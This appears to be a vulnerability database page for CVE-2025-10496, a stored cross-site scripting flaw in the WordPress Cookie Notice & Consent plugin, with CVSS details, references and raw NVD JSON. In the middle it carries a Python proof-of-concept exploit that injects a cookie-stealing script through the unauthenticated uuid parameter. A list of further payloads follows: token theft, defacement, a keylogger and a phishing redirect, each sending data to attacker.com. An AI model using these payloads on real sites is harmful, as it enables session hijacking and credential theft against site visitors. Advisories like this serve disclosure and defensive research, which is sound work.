CVE-2025-10496

Description

The Cookie Notice & Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the uuid parameter in all versions up to, and including, 1.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Cookie Notice & Consent for WordPress <= 1.6.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

## CVE-2025-10496 - Stored XSS via uuid parameter in Cookie Notice & Consent plugin
## Vulnerability: Stored Cross-Site Scripting (XSS)
## Affected: Cookie Notice & Consent for WordPress <= 1.6.5
## CVSS: 7.2 (HIGH)

import requests

# Target WordPress site with vulnerable Cookie Notice & Consent plugin
TARGET_URL = "http://target-wordpress-site.com"

# Malicious JavaScript payload to be injected via uuid parameter
# This payload will be stored and executed when victims visit the affected page
MALICIOUS_PAYLOAD = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>'

# Step 1: Inject malicious script via the vulnerable uuid parameter
# The plugin does not sanitize the uuid parameter before storing it
inject_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"

# Craft the request to trigger the vulnerable endpoint with malicious uuid
payload_data = {
    "action": "cnc_logger",  # The action that processes the uuid parameter
    "uuid": MALICIOUS_PAYLOAD,  # Unsanitized uuid parameter
}

# Send the injection request (no authentication required)
response = requests.post(inject_url, data=payload_data)
print(f"[*] Injection response status: {response.status_code}")

# Step 2: Verify the XSS payload was stored
# When any user visits the page, the stored script will execute automatically
print(f"[*] Malicious payload stored: {MALICIOUS_PAYLOAD}")
print(f"[*] Awaiting victim to visit the infected page...")
print(f"[+] When a victim visits, their cookies will be sent to: https://attacker.com/steal")

## Alternative simple payload examples:
## 1. Cookie stealing: <script>fetch('https://attacker.com/?c='+document.cookie)</script>
## 2. Session hijacking: <script>document.location='https://attacker.com/session?token='+localStorage.getItem('token')</script>
## 3. Defacement: <script>document.body.innerHTML='<h1>Hacked by Attacker</h1>'</script>
## 4. Keylogger injection: <script>document.onkeypress=function(e){fetch('https://attacker.com/log?k='+e.key)}</script>
## 5. Phishing redirect: <script>window.location='https://fake-login-page.com'</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10496
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10496
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10496/
[4] VulDB https://vuldb.com/cve/CVE-2025-10496
[5] https://plugins.trac.wordpress.org/browser/cookie-notice-consent/tags/1.6.5/includes/class-cnc-admin.php#L33
[6] https://plugins.trac.wordpress.org/browser/cookie-notice-consent/tags/1.6.5/includes/class-cnc-logger.php#L141
[7] https://plugins.trac.wordpress.org/browser/cookie-notice-consent/tags/1.6.5/includes/class-cnc-logger.php#L259
[8] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3373718%40cookie-notice-consent%2Ftrunk&old=3345005%40cookie-notice-consent%2Ftrunk&sfp_email=&sfph_mail=
[9] https://www.wordfence.com/threat-intel/vulnerabilities/id/035097dd-8ebd-49b8-93ea-0f957594f130?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10496", "sourceIdentifier": "[email protected]", "published": "2025-10-09T02:15:40.750", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Cookie Notice & Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the uuid parameter in all versions up to, and including, 1.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/cookie-notice-consent/tags/1.6.5/includes/class-cnc-admin.php#L33", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/cookie-notice-consent/tags/1.6.5/includes/class-cnc-logger.php#L141", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/cookie-notice-consent/tags/1.6.5/includes/class-cnc-logger.php#L259", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3373718%40cookie-notice-consent%2Ftrunk&old=3345005%40cookie-notice-consent%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/035097dd-8ebd-49b8-93ea-0f957594f130?source=cve", "source": "[email protected]"}]}}